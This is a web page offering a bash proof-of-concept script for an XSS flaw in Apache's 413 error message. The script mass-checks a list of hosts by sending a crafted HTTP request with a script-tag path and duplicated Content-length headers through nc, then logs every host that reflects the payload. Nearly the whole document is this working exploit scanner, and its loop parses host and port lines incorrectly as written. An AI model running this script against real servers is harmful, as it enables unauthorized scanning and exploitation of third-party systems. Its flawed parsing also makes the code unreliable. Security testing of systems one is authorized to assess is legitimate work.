Apache 413 Error Message XSS POC

A proof of concept script for Apache 413 Error Message XSS

#!/usr/bin/env bash
#
# Check Apache 413 XSS against a list of hosts running web server 
# Takes Argument 1 a file which contains a list of host (in format: hostname/IP PORT)
# Output a file with host(s) found to be vulnerable
#
#  ./xss_apache_413.sh hosts_file
#
#  sample content of hosts_file (line by line)
#
#  yehg.org 80
#  127.0.0.1 80
#
 
echo ++++++++++++++++++++++++++++++++++++
echo Apache 413 Error Message XSS POC
echo by Aung Khant, aungkhant[at]yehg.net, http://yehg.net
echo ++++++++++++++++++++++++++++++++++++
echo 
 
if [ $# -ne 1 ]
 then
  echo "Usage: ./$0 <hosts_file>"
  exit
fi
 
hostfile=$1
 
for i in `cat $hostfile`
do
sp1=`expr index $i " "`
sp2=`echo $sp1-1|bc`
host=`expr substr $i 1 $sp2`
port=${i:$sp1}
 
if  echo -en "<script>alert(0)<script>/ HTTP/1.1\nHost: $i\r\nConnection: close\r\nContent-length: 0\r\nContent-length: 0\r\n\r\n" | nc -w 4 $host $port | grep -i '<script>alert(0)<script>' > /dev/null 
 then
   echo -en "[!] $host on port $port ... \E[31mVULNERABLE!\n"
   tput sgr0
   echo $i >> $hostfile-apache-expect-xssed
else
   echo -en "[+] $host on port $port ... \E[32mOK\n"
   tput sgr0
fi
 
done

Submitted by Aung Khant

Apache 413 XSS

Apache 413 Error Message XSS POC

Related Scripts